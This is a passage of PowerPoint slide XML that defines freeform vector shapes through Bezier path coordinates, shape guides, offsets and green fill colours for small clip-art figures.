                      <a:pt x="118" y="180"/>
                      <a:pt x="121" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="149"/>
                      <a:pt x="121" y="129"/>
                      <a:pt x="121" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="103"/>
                      <a:pt x="120" y="94"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="85"/>
                      <a:pt x="119" y="84"/>
                      <a:pt x="119" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="81"/>
                      <a:pt x="118" y="81"/>
                      <a:pt x="118" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="79"/>
                      <a:pt x="118" y="78"/>
                      <a:pt x="118" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="80"/>
                      <a:pt x="119" y="83"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="93"/>
                      <a:pt x="122" y="102"/>
                      <a:pt x="123" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="112"/>
                      <a:pt x="145" y="111"/>
                      <a:pt x="159" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="79"/>
                      <a:pt x="151" y="55"/>
                      <a:pt x="150" y="48"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="39A962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78" name="Freeform 1885"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-914" y="-1984"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 42 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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79" name="Freeform 1886"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-914" y="-1984"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 42 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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80" name="Freeform 1887"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-924" y="-1989"/>
                <a:ext cx="206" cy="158"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 87"/>
                  <a:gd name="T1" fmla="*/ 8 h 67"/>
                  <a:gd name="T2" fmla="*/ 44 w 87"/>
                  <a:gd name="T3" fmla="*/ 0 h 67"/>
                  <a:gd name="T4" fmla="*/ 7 w 87"/>
                  <a:gd name="T5" fmla="*/ 51 h 67"/>
                  <a:gd name="T6" fmla="*/ 58 w 87"/>
                  <a:gd name="T7" fmla="*/ 65 h 67"/>
                  <a:gd name="T8" fmla="*/ 84 w 87"/>
                  <a:gd name="T9" fmla="*/ 40 h 67"/>
                  <a:gd name="T10" fmla="*/ 77 w 87"/>
                  <a:gd name="T11" fmla="*/ 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7" h="67">
                    <a:moveTo>
                      <a:pt x="77" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="4"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="1"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="7" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="61"/>
                      <a:pt x="41" y="67"/>
                      <a:pt x="58" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="62"/>
                      <a:pt x="76" y="46"/>
                      <a:pt x="84" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="22"/>
                      <a:pt x="82" y="13"/>
                      <a:pt x="77" y="8"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="39A962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81" name="Freeform 1888"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-746" y="-1864"/>
                <a:ext cx="19" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 8 w 8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0" y="0"/>
                      <a:pt x="3" y="1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82" name="Freeform 1889"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-746" y="-1864"/>
                <a:ext cx="19" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 8 w 8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0" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="8" y="0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983" name="Group 1999"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="10520935" y="2102353"/>
              <a:ext cx="187325" cy="490538"/>
              <a:chOff x="-3734" y="3542"/>
              <a:chExt cx="418" cy="1113"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="984" name="Freeform 2000"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3630" y="4050"/>
                <a:ext cx="217" cy="605"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 81 w 92"/>
                  <a:gd name="T1" fmla="*/ 3 h 256"/>
                  <a:gd name="T2" fmla="*/ 81 w 92"/>
                  <a:gd name="T3" fmla="*/ 3 h 256"/>
                  <a:gd name="T4" fmla="*/ 4 w 92"/>
                  <a:gd name="T5" fmla="*/ 0 h 256"/>
                  <a:gd name="T6" fmla="*/ 1 w 92"/>
                  <a:gd name="T7" fmla="*/ 29 h 256"/>
                  <a:gd name="T8" fmla="*/ 11 w 92"/>
                  <a:gd name="T9" fmla="*/ 217 h 256"/>
                  <a:gd name="T10" fmla="*/ 45 w 92"/>
                  <a:gd name="T11" fmla="*/ 216 h 256"/>
                  <a:gd name="T12" fmla="*/ 42 w 92"/>
                  <a:gd name="T13" fmla="*/ 55 h 256"/>
                  <a:gd name="T14" fmla="*/ 33 w 92"/>
                  <a:gd name="T15" fmla="*/ 43 h 256"/>
                  <a:gd name="T16" fmla="*/ 42 w 92"/>
                  <a:gd name="T17" fmla="*/ 55 h 256"/>
                  <a:gd name="T18" fmla="*/ 45 w 92"/>
                  <a:gd name="T19" fmla="*/ 216 h 256"/>
                  <a:gd name="T20" fmla="*/ 45 w 92"/>
                  <a:gd name="T21" fmla="*/ 222 h 256"/>
                  <a:gd name="T22" fmla="*/ 81 w 92"/>
                  <a:gd name="T23" fmla="*/ 229 h 256"/>
                  <a:gd name="T24" fmla="*/ 87 w 92"/>
                  <a:gd name="T25" fmla="*/ 53 h 256"/>
                  <a:gd name="T26" fmla="*/ 81 w 92"/>
                  <a:gd name="T27" fmla="*/ 3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2" h="256">
                    <a:moveTo>
                      <a:pt x="81" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="4"/>
                      <a:pt x="81" y="3"/>
                      <a:pt x="81" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="14"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="1" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="49"/>
                      <a:pt x="11" y="130"/>
                      <a:pt x="11" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="240"/>
                      <a:pt x="44" y="236"/>
                      <a:pt x="45" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="182"/>
                      <a:pt x="43" y="58"/>
                      <a:pt x="42" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="51"/>
                      <a:pt x="33" y="50"/>
                      <a:pt x="33" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="50"/>
                      <a:pt x="42" y="51"/>
                      <a:pt x="42" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="58"/>
                      <a:pt x="44" y="182"/>
                      <a:pt x="45" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="218"/>
                      <a:pt x="45" y="222"/>
                      <a:pt x="45" y="222"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="256"/>
                      <a:pt x="81" y="247"/>
                      <a:pt x="81" y="229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="162"/>
                      <a:pt x="84" y="68"/>
                      <a:pt x="87" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="28"/>
                      <a:pt x="83" y="5"/>
                      <a:pt x="8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85" name="Freeform 2001"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3734" y="3696"/>
                <a:ext cx="418" cy="508"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 172 w 177"/>
                  <a:gd name="T1" fmla="*/ 191 h 215"/>
                  <a:gd name="T2" fmla="*/ 151 w 177"/>
                  <a:gd name="T3" fmla="*/ 44 h 215"/>
                  <a:gd name="T4" fmla="*/ 125 w 177"/>
                  <a:gd name="T5" fmla="*/ 19 h 215"/>
                  <a:gd name="T6" fmla="*/ 91 w 177"/>
                  <a:gd name="T7" fmla="*/ 10 h 215"/>
                  <a:gd name="T8" fmla="*/ 61 w 177"/>
                  <a:gd name="T9" fmla="*/ 2 h 215"/>
                  <a:gd name="T10" fmla="*/ 31 w 177"/>
                  <a:gd name="T11" fmla="*/ 12 h 215"/>
                  <a:gd name="T12" fmla="*/ 4 w 177"/>
                  <a:gd name="T13" fmla="*/ 156 h 215"/>
                  <a:gd name="T14" fmla="*/ 26 w 177"/>
                  <a:gd name="T15" fmla="*/ 165 h 215"/>
                  <a:gd name="T16" fmla="*/ 41 w 177"/>
                  <a:gd name="T17" fmla="*/ 70 h 215"/>
                  <a:gd name="T18" fmla="*/ 49 w 177"/>
                  <a:gd name="T19" fmla="*/ 85 h 215"/>
                  <a:gd name="T20" fmla="*/ 48 w 177"/>
                  <a:gd name="T21" fmla="*/ 150 h 215"/>
                  <a:gd name="T22" fmla="*/ 58 w 177"/>
                  <a:gd name="T23" fmla="*/ 161 h 215"/>
                  <a:gd name="T24" fmla="*/ 102 w 177"/>
                  <a:gd name="T25" fmla="*/ 172 h 215"/>
                  <a:gd name="T26" fmla="*/ 125 w 177"/>
                  <a:gd name="T27" fmla="*/ 153 h 215"/>
                  <a:gd name="T28" fmla="*/ 127 w 177"/>
                  <a:gd name="T29" fmla="*/ 67 h 215"/>
                  <a:gd name="T30" fmla="*/ 129 w 177"/>
                  <a:gd name="T31" fmla="*/ 85 h 215"/>
                  <a:gd name="T32" fmla="*/ 150 w 177"/>
                  <a:gd name="T33" fmla="*/ 201 h 215"/>
                  <a:gd name="T34" fmla="*/ 172 w 177"/>
                  <a:gd name="T35" fmla="*/ 191 h 215"/>
                  <a:gd name="T36" fmla="*/ 43 w 177"/>
                  <a:gd name="T37" fmla="*/ 56 h 215"/>
                  <a:gd name="T38" fmla="*/ 45 w 177"/>
                  <a:gd name="T39" fmla="*/ 44 h 215"/>
                  <a:gd name="T40" fmla="*/ 44 w 177"/>
                  <a:gd name="T41" fmla="*/ 55 h 215"/>
                  <a:gd name="T42" fmla="*/ 44 w 177"/>
                  <a:gd name="T43" fmla="*/ 54 h 215"/>
                  <a:gd name="T44" fmla="*/ 43 w 177"/>
                  <a:gd name="T45" fmla="*/ 56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7" h="215">
                    <a:moveTo>
                      <a:pt x="172" y="191"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="171"/>
                      <a:pt x="154" y="62"/>
                      <a:pt x="151" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="27"/>
                      <a:pt x="133" y="22"/>
                      <a:pt x="125" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="16"/>
                      <a:pt x="104" y="13"/>
                      <a:pt x="91" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="7"/>
                      <a:pt x="70" y="4"/>
                      <a:pt x="61" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="0"/>
                      <a:pt x="34" y="4"/>
                      <a:pt x="31" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="9" y="136"/>
                      <a:pt x="4" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="175"/>
                      <a:pt x="22" y="180"/>
                      <a:pt x="26" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="158"/>
                      <a:pt x="37" y="103"/>
                      <a:pt x="41" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="75"/>
                      <a:pt x="44" y="81"/>
                      <a:pt x="49" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="100"/>
                      <a:pt x="54" y="119"/>
                      <a:pt x="48" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="155"/>
                      <a:pt x="52" y="160"/>
                      <a:pt x="58" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="164"/>
                      <a:pt x="95" y="171"/>
                      <a:pt x="102" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="174"/>
                      <a:pt x="129" y="161"/>
                      <a:pt x="125" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="132"/>
                      <a:pt x="125" y="78"/>
                      <a:pt x="127" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="67"/>
                      <a:pt x="128" y="79"/>
                      <a:pt x="129" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="107"/>
                      <a:pt x="140" y="147"/>
                      <a:pt x="150" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="215"/>
                      <a:pt x="177" y="214"/>
                      <a:pt x="172" y="191"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="45" y="42"/>
                      <a:pt x="45" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="48"/>
                      <a:pt x="44" y="51"/>
                      <a:pt x="44" y="55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4" y="55"/>
                      <a:pt x="44" y="55"/>
                      <a:pt x="43" y="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86" name="Freeform 2002"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3685" y="3696"/>
                <a:ext cx="322" cy="411"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 130 w 136"/>
                  <a:gd name="T1" fmla="*/ 44 h 174"/>
                  <a:gd name="T2" fmla="*/ 104 w 136"/>
                  <a:gd name="T3" fmla="*/ 19 h 174"/>
                  <a:gd name="T4" fmla="*/ 70 w 136"/>
                  <a:gd name="T5" fmla="*/ 10 h 174"/>
                  <a:gd name="T6" fmla="*/ 40 w 136"/>
                  <a:gd name="T7" fmla="*/ 2 h 174"/>
                  <a:gd name="T8" fmla="*/ 10 w 136"/>
                  <a:gd name="T9" fmla="*/ 12 h 174"/>
                  <a:gd name="T10" fmla="*/ 0 w 136"/>
                  <a:gd name="T11" fmla="*/ 69 h 174"/>
                  <a:gd name="T12" fmla="*/ 19 w 136"/>
                  <a:gd name="T13" fmla="*/ 76 h 174"/>
                  <a:gd name="T14" fmla="*/ 20 w 136"/>
                  <a:gd name="T15" fmla="*/ 70 h 174"/>
                  <a:gd name="T16" fmla="*/ 28 w 136"/>
                  <a:gd name="T17" fmla="*/ 85 h 174"/>
                  <a:gd name="T18" fmla="*/ 27 w 136"/>
                  <a:gd name="T19" fmla="*/ 150 h 174"/>
                  <a:gd name="T20" fmla="*/ 37 w 136"/>
                  <a:gd name="T21" fmla="*/ 161 h 174"/>
                  <a:gd name="T22" fmla="*/ 81 w 136"/>
                  <a:gd name="T23" fmla="*/ 172 h 174"/>
                  <a:gd name="T24" fmla="*/ 104 w 136"/>
                  <a:gd name="T25" fmla="*/ 153 h 174"/>
                  <a:gd name="T26" fmla="*/ 106 w 136"/>
                  <a:gd name="T27" fmla="*/ 67 h 174"/>
                  <a:gd name="T28" fmla="*/ 108 w 136"/>
                  <a:gd name="T29" fmla="*/ 85 h 174"/>
                  <a:gd name="T30" fmla="*/ 109 w 136"/>
                  <a:gd name="T31" fmla="*/ 93 h 174"/>
                  <a:gd name="T32" fmla="*/ 136 w 136"/>
                  <a:gd name="T33" fmla="*/ 89 h 174"/>
                  <a:gd name="T34" fmla="*/ 130 w 136"/>
                  <a:gd name="T35" fmla="*/ 44 h 174"/>
                  <a:gd name="T36" fmla="*/ 22 w 136"/>
                  <a:gd name="T37" fmla="*/ 56 h 174"/>
                  <a:gd name="T38" fmla="*/ 24 w 136"/>
                  <a:gd name="T39" fmla="*/ 44 h 174"/>
                  <a:gd name="T40" fmla="*/ 23 w 136"/>
                  <a:gd name="T41" fmla="*/ 55 h 174"/>
                  <a:gd name="T42" fmla="*/ 23 w 136"/>
                  <a:gd name="T43" fmla="*/ 54 h 174"/>
                  <a:gd name="T44" fmla="*/ 22 w 136"/>
                  <a:gd name="T45" fmla="*/ 56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6" h="174">
                    <a:moveTo>
                      <a:pt x="130" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="27"/>
                      <a:pt x="112" y="22"/>
                      <a:pt x="104" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="16"/>
                      <a:pt x="83" y="13"/>
                      <a:pt x="70" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="7"/>
                      <a:pt x="49" y="4"/>
                      <a:pt x="40" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="0"/>
                      <a:pt x="13" y="4"/>
                      <a:pt x="10" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="14"/>
                      <a:pt x="5" y="40"/>
                      <a:pt x="0" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="73"/>
                      <a:pt x="14" y="79"/>
                      <a:pt x="19" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="74"/>
                      <a:pt x="20" y="72"/>
                      <a:pt x="20" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="75"/>
                      <a:pt x="23" y="81"/>
                      <a:pt x="28" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="100"/>
                      <a:pt x="33" y="119"/>
                      <a:pt x="27" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="155"/>
                      <a:pt x="31" y="160"/>
                      <a:pt x="37" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="164"/>
                      <a:pt x="74" y="171"/>
                      <a:pt x="81" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="174"/>
                      <a:pt x="108" y="161"/>
                      <a:pt x="104" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="132"/>
                      <a:pt x="104" y="78"/>
                      <a:pt x="106" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="67"/>
                      <a:pt x="107" y="79"/>
                      <a:pt x="108" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="87"/>
                      <a:pt x="109" y="90"/>
                      <a:pt x="109" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="96"/>
                      <a:pt x="132" y="93"/>
                      <a:pt x="136" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="68"/>
                      <a:pt x="131" y="50"/>
                      <a:pt x="130" y="44"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="22" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="47"/>
                      <a:pt x="24" y="42"/>
                      <a:pt x="24" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="51"/>
                      <a:pt x="23" y="55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3" y="55"/>
                      <a:pt x="23" y="55"/>
                      <a:pt x="22" y="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87" name="Freeform 2003"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3576" y="3729"/>
                <a:ext cx="113" cy="116"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 48"/>
                  <a:gd name="T1" fmla="*/ 49 h 49"/>
                  <a:gd name="T2" fmla="*/ 0 w 48"/>
                  <a:gd name="T3" fmla="*/ 48 h 49"/>
                  <a:gd name="T4" fmla="*/ 43 w 48"/>
                  <a:gd name="T5" fmla="*/ 0 h 49"/>
                  <a:gd name="T6" fmla="*/ 48 w 48"/>
                  <a:gd name="T7" fmla="*/ 6 h 49"/>
                  <a:gd name="T8" fmla="*/ 7 w 48"/>
                  <a:gd name="T9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9">
                    <a:moveTo>
                      <a:pt x="7" y="49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2" y="35"/>
                      <a:pt x="36" y="6"/>
                      <a:pt x="43" y="0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32" y="20"/>
                      <a:pt x="9" y="42"/>
                      <a:pt x="7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88" name="Freeform 2004"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3586" y="3710"/>
                <a:ext cx="26" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 26"/>
                  <a:gd name="T1" fmla="*/ 137 h 137"/>
                  <a:gd name="T2" fmla="*/ 0 w 26"/>
                  <a:gd name="T3" fmla="*/ 2 h 137"/>
                  <a:gd name="T4" fmla="*/ 19 w 26"/>
                  <a:gd name="T5" fmla="*/ 0 h 137"/>
                  <a:gd name="T6" fmla="*/ 19 w 26"/>
                  <a:gd name="T7" fmla="*/ 12 h 137"/>
                  <a:gd name="T8" fmla="*/ 26 w 26"/>
                  <a:gd name="T9" fmla="*/ 137 h 137"/>
                  <a:gd name="T10" fmla="*/ 8 w 26"/>
                  <a:gd name="T11" fmla="*/ 137 h 137"/>
                  <a:gd name="T12" fmla="*/ 8 w 26"/>
                  <a:gd name="T13" fmla="*/ 13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37">
                    <a:moveTo>
                      <a:pt x="8" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="13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89" name="Freeform 2005"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3590" y="3670"/>
                <a:ext cx="137" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 58"/>
                  <a:gd name="T1" fmla="*/ 34 h 36"/>
                  <a:gd name="T2" fmla="*/ 9 w 58"/>
                  <a:gd name="T3" fmla="*/ 20 h 36"/>
                  <a:gd name="T4" fmla="*/ 14 w 58"/>
                  <a:gd name="T5" fmla="*/ 11 h 36"/>
                  <a:gd name="T6" fmla="*/ 47 w 58"/>
                  <a:gd name="T7" fmla="*/ 14 h 36"/>
                  <a:gd name="T8" fmla="*/ 50 w 58"/>
                  <a:gd name="T9" fmla="*/ 26 h 36"/>
                  <a:gd name="T10" fmla="*/ 26 w 58"/>
                  <a:gd name="T11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" h="36">
                    <a:moveTo>
                      <a:pt x="26" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="33"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="9" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="19"/>
                      <a:pt x="12" y="14"/>
                      <a:pt x="14" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="9"/>
                      <a:pt x="47" y="0"/>
                      <a:pt x="47" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="19"/>
                      <a:pt x="42" y="22"/>
                      <a:pt x="50" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="29"/>
                      <a:pt x="40" y="36"/>
                      <a:pt x="26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0" name="Freeform 2006"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
